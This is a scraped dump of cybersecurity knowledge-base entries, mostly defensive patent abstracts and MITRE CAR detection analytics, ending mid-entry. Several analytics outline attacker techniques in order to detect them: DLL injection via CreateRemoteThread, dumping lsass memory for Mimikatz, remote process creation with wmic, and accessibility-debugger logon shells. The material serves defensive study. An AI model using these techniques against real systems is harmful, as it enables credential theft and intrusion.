  • "A network switch comprising a switching Application Specific Integrated Circuit (ASIC) and a Virtual Switching Engine (VSE) connected to a plurality of ports. The switching ASIC has a high-speed memory table which enables it to look up addresses that it has previously obtained and to forward unicast packets to said addresses. The VSE is a CPU that makes switching decisions outside of the ASIC and keeps track of any unknown addresses, forwarding the packets out the appropriate ports and answers broadcast packets by proxy for all known addresses without forwarding any of the packets down the VLANs, thereby freeing the VLAN bandwidth from excessive traffic. The system requires no user configuration because the switching methodology is self-adaptive to the network in which it is inserted and has the ability to perform router functions such as level 2 and 3 switching, spanning tree protocols and compatibility with Internetwork Packet and Internetwork Packet Exchange networks."

kb-author

  • "Ballard C. Bare"

kb-mitre-analysis

  • ""

kb-organization

  • "Hewlett Packard Enterprise Development LP"

rdfs:label

  • "Reference - Broadcast isolation and level 3 network switch - Hewlett Packard Enterprise Development LP"

kb-reference-of

kb-reference-title

  • "Broadcast isolation and level 3 network switch"

Usage (5)

kb-abstract

  • "As described in ATT&CK, an adversary can use Windows Management Instrumentation (WMI) to view or manipulate objects on a remote host. It can be used to remotely edit configuration, start services, query files, and anything that can be done with a WMI class. When remote WMI requests are over RPC (CAR-2014-05-001), it connects to a DCOM interface within the RPC group netsvcs. To detect this activity, a sensor is needed at the network level that can decode RPC traffic or on the host where the communication can be detected more natively, such as Event Tracing for Windows. Using wireshark/tshark decoders, the WMI interfaces can be extracted so that WMI activity over RPC can be detected.

    Although the description details how to detect remote WMI precisely, a decent estimate has been to look for the string RPCSS within the initial RPC connection on 135/tcp. It returns a superset of this activity, and will trigger on all DCOM-related services running within RPC, which is likely to also be activity that should be detected between hosts. More about RPCSS at : rpcss_dcom_interfaces.html"

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-007: Remote Windows Management Instrumentation (WMI) over RPC - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-007: Remote Windows Management Instrumentation (WMI) over RPC"

Usage (5)

kb-abstract

  • "MagicDraw offers the most robust standards compliant [Unified Architecture Framework (UAF)], DoDAF 2.0, MODAF 1.2, NAF 3, and NAF 4 via a UAF standardized solution. And what's more, No Magic fully supports all architectural framework products ensuring you achieve project results. No Magic also leads the industry in usability and interoprability, ensuring that you avoid unnecessary cost, schedule and performance risk."

kb-organization

  • "Dassault Systemes"

rdfs:label

  • "Reference - Catia UAF Plugin"

kb-reference-of

kb-reference-title

  • "Catia UAF Plugin"

Usage (5)

kb-abstract

  • "An access control list (ACL) consists of one or more access control entries (ACEs) that collectively define the network traffic profile. This profile can then be referenced by Cisco IOS XR Software software features such as traffic filtering, priority or custom queueing, and dynamic access control. Each ACL includes an action element (permit or deny) and a filter element based on criteria such as source address, destination address, protocol, and protocol-specific parameters."

kb-organization

  • "Cisco"

rdfs:label

  • "Reference - Cisco ASR 9000 Series Aggregation Services Routers - Access List Commands"

kb-reference-of

kb-reference-title

  • "Cisco ASR 9000 Series Aggregation Services Routers - Access List Commands"

Usage (5)

kb-abstract

  • "An adversary can use accessibility features (Ease of Access), such as StickyKeys or Utilman, to launch a command shell from the logon screen and gain SYSTEM access. Since an adversary does not have physical access to the machine, this technique must be run within Remote Desktop. To prevent an adversary from getting to the login screen without first authenticating, Network-Level Authentication (NLA) must be enabled. If a debugger is set up for one of the accessibility features, then it will intercept the process launch of the feature and instead execute a new command line. This analytic looks for instances of cmd.exe or powershell.exe launched directly from the logon process, winlogon.exe. It should be used in tandem with CAR-2014-11-003, which detects the accessibility programs in the command line."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-008: Command Launched from WinLogon - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-008: Command Launched from WinLogon"

Usage (5)

kb-abstract

  • "Before exfiltrating data that an adversary has collected, it is very likely that a compressed archive will be created, so that transfer times are minimized and fewer files are transmitted. There is variety between the tools used to compress data, but the command line usage and context of archiving tools, such as ZIP, RAR, and 7ZIP, should be monitored.

    In addition to looking for RAR or 7z program names, command line usage of 7Zip or RAR can be detected with the flag usage of "\* a \*". This is helpful, as adversaries may change program names."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-07-005: Command Line Usage of Archiving Software - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-07-005: Command Line Usage of Archiving Software"

Usage (5)

kb-abstract

  • "Example techniques described herein determine a signature or classification of a data stream such as a file. The classification can indicate whether the data stream is associated with malware. A processor can locate training analysis regions of training data streams based on predetermined structure data, and determining training model inputs based on the training analysis regions. The processor can determine a computational model based on the training model inputs. The computational model can receive an input vector and provide a corresponding feature vector. The processor can then locate a trial analysis region of a trial data stream based on the predetermined structure data and determine a trial model input. The processor can operate the computational model based on the trial model input to provide a trial feature vector, e.g., a signature. The processor can operate a second computational model to provide a classification based on the signature."

kb-author

  • "Sven Krasser; David Elkind; Patrick Crenshaw; Brett Meyer"

kb-mitre-analysis

  • "Provides a mechanism to classify files using file signatures based on a computational model. Training data that comprises at least a portion of a file, e.g. number of bytes, is used as input to the computational model to develop a file signature and classify the file as malware."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Computational modeling and classification of data streams - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Computational modeling and classification of data streams"

Usage (5)

kb-abstract

  • "Methods and systems are disclosed for selecting text character strings from a corpus of relevant strings that would commonly be considered to be visually similar to human viewer to an input string. The initial corpus may be any sufficiently broad or specific source of text, e.g., the names of users in a computer application system. The character strings in the corpus are classified such that direct, character-by-character comparisons may be limited to a small subset of likely-similar strings. The input string is then directly compared to strings that are likely to be similar to it, taking into account individual characters' similarities, combinations of characters that look similar to individual characters, transposition of characters, and simple additions and deletions."

kb-author

  • "Raymond W. Wallace, III"

kb-mitre-analysis

  • "Text input is compared to an engine of look-alike sets of text characters. An estimate of similar characters based on the engine is conducted, and an alert is triggered if the estimated similarity is lower than a given threshold."

kb-organization

  • "Greathorn Inc"

rdfs:label

  • "Reference - Computer-implemented methods and systems for identifying visually similar text character strings - Greathorn Inc"

kb-reference-of

kb-reference-title

  • "Computer-implemented methods and systems for identifying visually similar text character strings"

Usage (5)

kb-abstract

  • ""A computer worm defense system comprises multiple containment systems tied together by a management system. Each containment system is deployed on a separate communication network and contains a worm sensor and a blocking system. In various embodiments, the computer worm may be transported from a production network, where the computer worm is not readily identifiable, to an alternate network in the worm sensor where the computer worm may be readily identifiable. Computer worm identifiers generated by a worm sensor of one containment system can be provided not only to the blocking system of the same containment system, but can also be distributed by the management system to blocking systems of other containment systems.""

kb-author

  • "Ashar Aziz"

kb-mitre-analysis

  • "This patent describes network data being copied by a tap and then analyzed in an analysis environment to determine whether the network data is suspicious using a heuristic module. The analysis environment replays transmission of the suspicious network data between a configured replayer and a virtual machine to detect unauthorized activity."

kb-organization

  • "FireEye Inc"

rdfs:label

  • "Reference - Computer Worm Defense System and Method - FireEye Inc"

kb-reference-of

kb-reference-title

  • "Computer Worm Defense System and Method"

Usage (5)

kb-abstract

  • "Adversaries may use Windows Management Instrumentation (WMI) to move laterally, by launching executables remotely.The analytic CAR-2014-12-001 describes how to detect these processes with network traffic monitoring and process monitoring on the target host. However, if the command line utility wmic.exe is used on the source host, then it can additionally be detected on an analytic. The command line on the source host is constructed into something like wmic.exe /node:"\<hostname\>" process call create "\<command line\>". It is possible to also connect via IP address, in which case the string "\<hostname\>" would instead look like IP Address.

    Although this analytic was created after CAR-2014-12-001, it is a much simpler (although more limited) approach. Processes can be created remotely via WMI in a few other ways, such as more direct API access or the built-in utility PowerShell."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2016-03-002: Create Remote Process via WMIC - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2016-03-002: Create Remote Process via WMIC"

Usage (5)

kb-abstract

  • "Credential dumpers like Mimikatz can be loaded into memory and from there read data from another processes. This analytic looks for instances where processes are requesting specific permissions to read parts of the LSASS process in order to detect when credential dumping is occurring. One weakness is that all current implementations are "overtuned" to look for common access patterns used by Mimikatz."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-04-004: Credential Dumping via Mimikatz - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-04-004: Credential Dumping via Mimikatz"

Usage (5)

kb-abstract

  • "The Windows Task Manager may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching Task Manager as a privileged user, selecting lsass.exe, and clicking "Create dump file". This saves a dump file to disk with a deterministic name that includes the name of the process being dumped.

    This requires filesystem data to determine whether files have been created."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-08-001: Credential Dumping via Windows Task Manager - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-08-001: Credential Dumping via Windows Task Manager"

Usage (5)

kb-abstract

  • "MITRE’s Cyber Command System (CyCS) tool addresses the objective of improved mission assurance in cyberspace by enabling the mapping of mission operations to the network operations that support those missions. This tool provides mission-impact assessment through situational awareness and impact analysis. CyCS addresses mission-assurance challenges for highly distributed enterprise systems of systems through vulnerability, threat, and consequence management."

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - Cyber Command System (CYCS)"

kb-reference-of

kb-reference-title

  • "Cyber Command System (CYCS)"

Usage (5)

kb-abstract

  • "Microsoft Windows allows for processes to remotely create threads within other processes of the same privilege level. This functionality is provided via the Windows API CreateRemoteThread. Both Windows and third-party software use this ability for legitimate purposes. For example, the Windows process csrss.exe creates threads in programs to send signals to registered callback routines. Both adversaries and host-based security software use this functionality to inject DLLs, but for very different purposes. An adversary is likely to inject into a program to evade defenses or bypass User Account Control, but a security program might do this to gain increased monitoring of API calls. One of the most common methods of DLL Injection is through the Windows API LoadLibrary.

    Allocate memory in the target program with VirtualAllocEx
    Write the name of the DLL to inject into this program with WriteProcessMemory
    Create a new thread and set its entry point to LoadLibrary using the API CreateRemoteThread.
    This behavior can be detected by looking for thread creations across processes, and resolving the entry point to determine the function name. If the function is LoadLibraryA or LoadLibraryW, then the intent of the remote thread is clearly to inject a DLL. When this is the case, the source process must be examined so that it can be ignored when it is both expected and a trusted process."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-10-002: DLL Injection via Load Library - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-10-002: DLL Injection via Load Library"

Usage (5)

kb-author

  • "Microsoft"

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - /DYNAMICBASE (Use address space layout randomization) - Microsoft Docs"

kb-reference-of

kb-reference-title

  • "/DYNAMICBASE (Use address space layout randomization)"

Usage (5)

kb-abstract

  • "Dagger is a modeling and visualization tool suite that shows how system failures impact mission status. Updated with manual or real-time status, Dagger is used for mission/system planning, situational awareness during mission execution, and course-of-action analysis."

kb-author

  • "Jackie Soenneker"

kb-organization

  • "JHU APL"

rdfs:label

  • "Reference - Dagger Fact Sheet"

kb-reference-of

kb-reference-title

  • "Dagger Fact Sheet"

Usage (5)

kb-abstract

  • "Dagger is a modeling and visualization framework that addresses the challenge of representing knowledge and information for decision-makers, enabling them to better comprehend the operational context of network security data. It allows users to answer critical questions such as “Given that I care about mission X, is there any reason I should be worried about what is going on in cyberspace?” or “If this system fails, will I still be able to accomplish my mission?”."

kb-author

  • "Elisha Peterson"

kb-organization

  • "JHU APL"

rdfs:label

  • "Reference - Dagger: Modeling and visualization for mission impact situational awareness"

kb-reference-of

kb-reference-title

  • "Dagger: Modeling and visualization for mission impact situational awareness"

Usage (5)

kb-abstract

  • "Malware depends on its ability to insert a malicious payload into memory with the hope that it will be executed later. Wouldn't it be great if you could prevent malware from running if it wrote to an area that has been allocated solely for the storage of information?

    Data Execution Prevention (DEP) does exactly that, by substantially reducing the range of memory that malicious code can use for its benefit. DEP uses the No eXecute bit on modern CPUs to mark blocks of memory as read-only so that those blocks can't be used to execute malicious code that may be inserted by means of a vulnerability exploit."

kb-author

  • "Nick Schonning, Daniel Simpson, Marty Hernandez Avedon, Trond B. Krokli, jreeds, jcaparas, Andres Mariano Gorzelany, Tina Burden, Thomas Raya, Justin Hall, justanotheranonymoususer, Liza Poggemeyer, Dani Halfin, imba-tjd (Authors for entire page)"

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - Mitigate threats by using Windows 10 security features: Data Execution Prevention - Microsoft"

kb-reference-of

kb-reference-title

  • "Mitigate threats by using Windows 10 security features: Data Execution Prevention"

Usage (5)

kb-abstract

  • "In particular embodiments, a data processing data inventory generation system is configured to: (1) generate a data model (e.g., a data inventory) for one or more data assets utilized by a particular organization; (2) generate a respective data inventory for each of the one or more data assets; and (3) map one or more relationships between one or more aspects of the data inventory, the one or more data assets, etc. within the data model. In particular embodiments, a data asset (e.g., data system, software application, etc.) may include, for example, any entity that collects, processes, contains, and/or transfers personal data (e.g., such as a software application, “internet of things” computerized device, database, website, data-center, server, etc.). The system may be configured to identify particular data assets and/or personal data in data repositories using any suitable intelligent identity scanning technique."

kb-author

  • "Kabir A. Barday, Mihir S. Karanjkar, Steven W. Finch, Ken A. Browne, Nathan W. Heard, Aakash H. Patel, Jason L. Sabourin, Richard L. Daniel, Dylan D. Patton-Kuhl, Jonathan Blake Brannon"

kb-organization

  • "OneTrust LLC"

rdfs:label

  • "Reference - Data processing and scanning systems for generating and populating a data inventory"

kb-reference-of

kb-reference-title

  • "Data processing and scanning systems for generating and populating a data inventory"

Usage (5)

kb-author

  • "Steven Kirsch"

rdfs:label

  • "Reference - Database for receiving, storing and compiling information about email messages"

kb-reference-of

kb-reference-title

  • "Database for receiving, storing and compiling information about email messages"

Usage (5)

kb-abstract

  • "The Windows Registry location HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options allows for parameters to be set for applications during execution. One feature used by malicious actors is the "Debugger" option. When a key has this value enabled, a Debugging command line can be specified. Windows will launch the Debugging command line, and pass the original command line in as an argument. Adversaries can set a Debugger for Accessibility Applications. The analytic looks for the original command line as an argument to the Debugger. When the strings "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", and "Magnify.exe" are detected in the arguments, but not as the main executable, it is very likely that a Debugger is set.

    This analytic could depend on the possibility of the known strings used as arguments for other applications used in the day-to-day environment. Although the chance of the string "sethc.exe" being used as an argument for another application is unlikely, it still is a possibility."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-003: Debuggers for Accessibility Applications - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-003: Debuggers for Accessibility Applications"

Usage (5)

kb-abstract

  • "Deception-based techniques for responding to security attacks are described herein. The techniques include transitioning a security attack to a monitored computing device posing as a computing device impacted by the security attack and enabling the adversary to obtain deceptive information from the monitored computing device. Also, the adversary may obtain a document configured to report identifying information of an entity opening the document, thereby identifying the adversary associated with the attack. Further, the techniques include determining that a domain specified in a domain name request is associated with malicious activity and responding to the request with a network address of a monitored computing device to cause the requesting process to communicate with the monitored computing device in place of an adversary server. Additionally, a service may monitor dormant domains names associated with malicious activity and, in response to a change, respond with an alert or a configuration update."

kb-author

  • "Adam S. Meyers; Dmitri Alperovitch; George Robert Kurtz; David F. Diehl; Sven Krasser"

kb-mitre-analysis

  • ""

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Deception-Based Responses to Security Attacks - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Deception-Based Responses to Security Attacks"

Usage (5)

kb-abstract

  • "A computer implemented method of detecting unauthorized access to a protected network by monitoring a dynamically updated deception environment, comprising launching, on one or more decoy endpoints, one or more decoy operating system (OS) managing one or more of a plurality of deception applications mapping a plurality of applications executed in a protected network, updating dynamically a usage indication for a plurality of deception data objects deployed in the protected network to emulate usage of the plurality of deception data objects for accessing the deception application(s) wherein the plurality of deception data objects are configured to trigger an interaction with the deception application(s) when used, detecting usage of data contained in the deception data object(s) by monitoring the interaction and identifying one or more potential unauthorized operations based on analysis of the detection."

kb-author

  • "Dean Sysman; Gadi Evron; Imri Goldberg; Itamar Sher; Shmuel Ur"

kb-mitre-analysis

  • ""

kb-organization

  • "Cymmetria Inc"

rdfs:label

  • "Reference - Decoy and deceptive data object technology - Cymmetria Inc"

kb-reference-of

kb-reference-title

  • "Decoy and deceptive data object technology"

Usage (5)

kb-abstract

  • "What if online scammers weren't sure whether the user account they are targeting is really yours, or whether the information they compiled about you is real? It's worth considering whether decoy online personas might help in the quest to safeguard our digital identities and data.

    I believe deception tactics, such as selective and careful use of honeypots, holds promise for defending enterprise IT resources. Some forms of deception could also protect individuals against online scammers and other attackers. This approach might not be quite practical today for most people, but in the future we might find it both necessary and achievable.

    Human attackers and malicious software pursue user accounts and data on-line through harvesting, phishing, password-guessing, software vulnerabilities, and various other means. How might we use decoys to confuse, misdirect, slow down and detect adversaries engaged in such activities?

    ...

    The wealth of personal details available on social networking sites allows attackers to target individuals using social engineering, secret question-guessing and other techniques. For some examples of such approaches, see The Use of Fake or Fraudulent LinkedIn Profiles and Data Mining Resumes for Computer Attack Reconnaissance.

    Setting up one or more fake social network profiles (e.g., on Facebook) that use the person's real name can help the individual deflect the attack or can act as an early warning of an impending attack. A decoy profile could purposefully expose some inaccurate information, while the person's real profile would be more carefully concealed using the site's privacy settings. Decoy profiles would be associated with spamtrap email addresses.

    Similarly, the person could expose decoy profiles on other sites, for instance those reveal shopping habits (e.g., Amazon), musings (e.g., Twitter), skills (e.g., GitHub), travel (e.g., TripIt), affections (e.g., Pinterest), music taste (e.g., Pandora) and so on. The person's decoy identities could also have fake resumes available on sites such as Indeed and Monster.com."

kb-author

  • "Lenny Zeltser"

kb-mitre-analysis

  • ""

kb-organization

  • "SANS"

rdfs:label

  • "Reference - Decoy Personas for Safeguarding Online Identity Using Deception - MITRE"

kb-reference-of

kb-reference-title

  • "Decoy Personas for Safeguarding Online Identity Using Deception"

Usage (5)

kb-abstract

  • "A DDoS (Distributed Denial-of-Service) attack is very common and easy toexecute and does not require any sophisticated tools. It can happen to anyone. In this project we deploy snort in our home network as a NIDS (Network Intrusion Detection System) to detect a DDoS attack and prevent it."

kb-author

  • "Manas Gogoi, Sourav Mishra"

kb-organization

  • "Indian Institute of Information Technology Allahabad"

rdfs:label

  • "Reference - Detecting DDoS Attack Using Snort"

kb-reference-of

kb-reference-title

  • "DETECTING DDoS ATTACK USING Snort"

Usage (5)

kb-abstract

  • "A method and system for detecting network reconnaissance is disclosed wherein network traffic can be parsed into unidirectional flows that correspond to sessions. A learning module may categorize computing entities inside the network into assets and generate asset data to monitor the computing entities. If one or more computing entities address a flow to an address of a host that no longer exists, ghost asset data may be recorded and updated in the asset data. When a computing entity inside the network contacts an object in the dark-net, the computing entity may be recorded a potential mapper. When the computing entity tries to contact a number of objects in the dark-net, such that a computed threshold is exceeded, the computing entity is identified a malicious entity performing network reconnaissance."

kb-author

  • "Nicolas BEAUCHESNE; Sungwook Yoon"

kb-mitre-analysis

  • "This patent describes detecting an attacker performing internal reconnaissance within an organization's network to gather intelligence about the configuration of the network or identify the next target. Network packets are collected (ex. tapped from a network switch) and processed to create flows that are used to map out the network to identify network assets as well as ghost assets (addresses not assigned to a device or an existing device that is temporarily disabled). Once this mapping is complete it is used to monitor the network to determine if an attacker is attempting to connect to a ghost asset. If an attacker attempts to connect to a ghost asset over a threshold (ex. contacting four ghost assets in less than seven minutes), an alert is generated."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - Detecting network reconnaissance by tracking intranet dark-net communications - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "Detecting network reconnaissance by tracking intranet dark-net communications"

Usage (5)

kb-abstract

  • "Described herein are systems, techniques, and computer program products for preventing execution, by a scripting engine, of harmful commands that may be introduced by computer malware or other mechanisms. The system identifies certain host processes that may attempt to utilize a hosted scripting engine. An unmanaged interface module is injected into an identified host process. The unmanaged interface module is configured to detect certain conditions indicating the likelihood that a scripting engine will be instantiated, and in response to inject a managed interface module into the host process. The managed interface module hooks into certain methods of the scripting engine to intercept commands before they are executed by the scripting engine. The managed and unmanaged interface components then communicate with a kernel-mode threat detection component to determine whether any commands should be blocked."

kb-author

  • "Ion-Alexandru IONESCU; Satoshi Tanda"

kb-mitre-analysis

  • "The patent describes techniques that can be implemented to detect and block malicious commands and command scripts from being executed by scripting engines.

    ### Script Execution Monitoring explanation
    This patent describes software installed on the host system that hooks into methods of a scripting engine to intercept commands before they are executed and block commands if they are determined to be harmful. For example regular expression checking may be used to identify commands having malicious patterns. Expression checking may be used for script files as well as interactively - typed commands.

    ### File Content Signatures explanation
    This patent includes File Content Signatures because in the case of a script file, a hash of the file is compared against hashes of known malicious script files to determine whether the script file is malicious."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Detecting script-based malware - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Detecting script-based malware"

Usage (5)

kb-abstract

  • "In one aspect, a method useful for preventing exploitation of a vulnerability in an interpreted code by monitoring and validating an execution of the interpreted code in a script file by an application server, includes the step of generating a mapping for an incoming network connection to a specified script file to be executed by an application server. The computerized method includes the step of inserting a hook for monitoring an application programming interface (API) call or a privileged instruction executed by the application server. The computerized method includes the step of inserting a validation code configured to validate the API call or the privileged instruction executed by the interpreted code in a script."

kb-author

  • "Jayant Shukla"

kb-mitre-analysis

  • "This patent describes a technique for monitoring API calls. During execution of interpreted code the observed API calls are validated against a whitelist of API calls for that interpreted code file. Action is taken if the observed API call is not in accordance with the list."

kb-organization

  • "K2 Cyber Security Inc"

rdfs:label

  • "Reference - Deterministic method for detecting and blocking of exploits on interpreted code - K2 Cyber Security Inc"

kb-reference-of

kb-reference-title

  • "Deterministic method for detecting and blocking of exploits on interpreted code"

Usage (5)

kb-abstract

  • "A security system provides a defense from known and unknown viruses, worms, spyware, hackers, and social engineering attacks. The system can implement centralized policies that allow an administrator to approve, block, quarantine, and log file activities. A server associated with a number of hosts can provide a query for host computers to access security-related meta-information in local host stores. The query is pulled from the server by the hosts. The results of the distributed host query are stored and merged on the server, and exported for display, reports, or security response."

kb-author

  • "Todd Brennan; John Hanratty"

kb-mitre-analysis

  • "Provides a mechanism to detect, monitor, locate, and control files installed on host computers. Each host has a host agent that analyzes file system activity and takes action based on policies configured on a server. The policies identify whether to block, log, allow, or quarantine actions such as file accesses and execution of executables. Examples of policies include:

    * Block/log execution of new executables and detached scripts (e.g., .exe or .bat)
    * Block/log reading/execution of new embedded content (e.g., macros in .doc)
    * Block/log installation/modification of Web content (alteration of content in .html or .cgi files)
    * Block/log execution of new files in an administratively defined 'class'; e.g., an administrator might want to block screen savers .scr, but not the entire class of executables .exe, .dll, .sys, etc . . ."

kb-organization

  • "Bit 9 Inc"

rdfs:label

  • "Reference - Distributed meta-information query in a network - Bit 9 Inc"

kb-reference-of

kb-reference-title

  • "Distributed meta-information query in a network"

Usage (5)

kb-abstract

  • "Systems and methods of identifying a security risk by monitoring and generating alerts based on attempts to access web domains that have been registered within a short period of time and are therefore identified as "high-risk," including identifying an attempt to access a domain; receiving a registration date of the domain; and detecting a security risk based on the registration date of the domain."

kb-author

  • "Samuel Adams; H D. Moore"

kb-mitre-analysis

  • ""

kb-organization

  • "Rapid7 Inc."

rdfs:label

  • "Reference - Domain age registration alert - Inc Rapid7 Inc RAPID7 Inc"

kb-reference-of

kb-reference-title

  • "Domain age registration alert"

Usage (5)

kb-abstract

  • "Techniques for dynamic selection and generation of detonation location of suspicious content with a honey network are disclosed. In some embodiments, a system for dynamic selection and generation of detonation location of suspicious content with a honey network includes a virtual machine (VM) instance manager that manages a plurality of virtual clones executed in an instrumented VM environment, in which the plurality of virtual clones executed in the instrumented VM environment correspond to the honey network that emulates a plurality of devices in an enterprise network; and an intelligent malware detonator that detonates a malware sample in at least one of the plurality of virtual clones executed in the instrumented VM environment."

kb-author

  • "Taylor Ettema; Huagang Xie"

kb-mitre-analysis

  • ""

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - Dynamic selection and generation of a virtual clone for detonation of suspicious content within a honey network - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "Dynamic selection and generation of a virtual clone for detonation of suspicious content within a honey network"

Usage (5)

kb-abstract

  • "In this paper, we describe characteristics of the most widely used defense techniques for the blocking of user-initiated malware and why these techniques are insufficient. We then introduce a module verification strategy that will eliminate, or at least severely reduce, this problem by extending the classic "defense in depth" network security strategy. We then describe how the augmentation of a standard operating system loader to include references to a database of cryptographic hashes of module executables can be used to implement this strategy. Finally, we describe our efforts towards the creation of a prototype system that implements the module verification strategy."

kb-author

  • "John V. Harrison"

kb-mitre-analysis

  • "This paper describes application whitelisting. New software executable code is compared to a database of allowed software to determine if the new executable code should be loaded and executed. A database of cryptographic hashes is first created for all allowed software executables. Prior to loading any new executable code, a hash is computed and compared against the hash database. If the hash for the new code does not appear in the database, the executable is not loaded and executed."

kb-organization

  • ""

rdfs:label

  • "Reference - Enhancing Network Security By Preventing User-Initiated Malware Execution - MITRE"

kb-reference-of

kb-reference-title

  • "Enhancing Network Security By Preventing User-Initiated Malware Execution"

Usage (5)

kb-abstract

  • "In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows built-in command AT (at.exe) to schedule a command to be run at a specified time, date, and even host. This method has been used by adversaries and administrators alike. Its use may lead to detection of compromised hosts and compromised users if it is used to move laterally. The built-in Windows tool schtasks.exe (CAR-2013-08-001) offers greater flexibility when creating, modifying, and enumerating tasks. For these reasons, schtasks.exe is more commonly used by administrators, tools/scripts, and power users."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-05-004: Execution with AT - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-05-004: Execution with AT"

Usage (5)

kb-abstract

  • "The Windows built-in tool schtasks.exe provides the creation, modification, and running of scheduled tasks on a local or remote computer. It is provided as a more flexible alternative to at.exe, described in CAR-2013-05-004. Although used by adversaries, the tool is also legitimately used by administrators, scripts, and software configurations. The scheduled tasks tool can be used to gain Persistence and can be used in combination with a Lateral Movement technique to remotely gain execution. Additionally, the command has parameters to specify the user and password responsible for creating the task, as well as the user and password combination that the task will run as. The /s flag will cause a task to run as the SYSTEM user, usually indicating privilege escalation."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-08-001: Execution with schtasks - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-08-001: Execution with schtasks"

Usage (5)

kb-abstract

  • "delivered to DARPA in ~1993"

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - FWTK - Firewall Toolkit"

kb-reference-title

  • "FWTK - Firewall Toolkit"

Usage (5)

kb-abstract

  • "A security agent implemented on a computing device is described herein. The security agent is configured to detect file-modifying malware by detecting that a process is traversing a directory of the memory of the computing device and detecting that the process is accessing files in the memory according to specified file access patterns. The security agent can also be configured to correlate actions of multiple processes that correspond to a specified file access pattern and detect that one or more of the multiple processes are malware by correlating their behavior."

kb-author

  • "Daniel W. Brown"

kb-mitre-analysis

  • "This patent describes a technique for detecting file modifying malware such as wipers and ransomware that overwrite portions of files and encrypt portions of a computer's memory, respectively. Processes that are traversing a directory are identified along with file access patterns. Processes executing on a computing device that are traversing a directory include:

    * changing a directory of a process (e.g., iteratively, systematically, repeatedly)
    * detecting that a process is conducting an "open directory" operation repeatedly
    * the same process traversing through a directory and recording the locations of data files encountered in each sub - directory

    In addition to identifying processes traversing a directory, particular file access patterns are also detected that may be indicative of malicious behavior including:
    * multiple file types being accessed
    * accessing a large number of files
    * files located in multiple locations in the directory being accessed

    If a process is conducting a traversal of the directory and accessing files according to a defined access pattern associated with malicious behavior, a preventative action is performed."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - File-modifying malware detection - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "File-modifying malware detection"

Usage (5)

kb-author

  • "Geoffrey John Hulten, Paul Stephen Rehfuss, Robert Rounthwaite, Joshua Theodore Goodman, Gopalakrishnan Seshadrinathan, Anthony P. Penta, Manav Mishra, Roderic C. Deyo, Elliott Jeb Haber, David Aaron Ward Snelling"

rdfs:label

  • "Reference - Finding phishing sites"

kb-reference-of

kb-reference-title

  • "Finding phishing sites"

Usage (5)

kb-abstract

  • "Regulating the flow of internetwork connections through a firewall (10) having a network protocol stack (14,16,18) which includes an Internet Protocol (IP) layer (16). A determination is made of the parameters characteristic of a connection request, including a netelement parameter characteristic of where the connection request came from. A query is generated and a determination is made whether there is a rule corresponding to that query. If there is a rule corresponding to the query, a determination is made whether authentication is required by the rule. If authentication is required by the rule, an authentication protocol is activated and the connection is activated if the authentication protocol is completed successfully."

kb-author

  • "Edward B Stockwell, Alan E Klietz"

kb-mitre-analysis

  • ""

kb-organization

  • "Secure Computing LLC"

rdfs:label

  • "Reference - Firewall for interent access - Secure Computing LLC"

kb-reference-of

kb-reference-title

  • "Firewall for interent access"

Usage (5)

kb-abstract

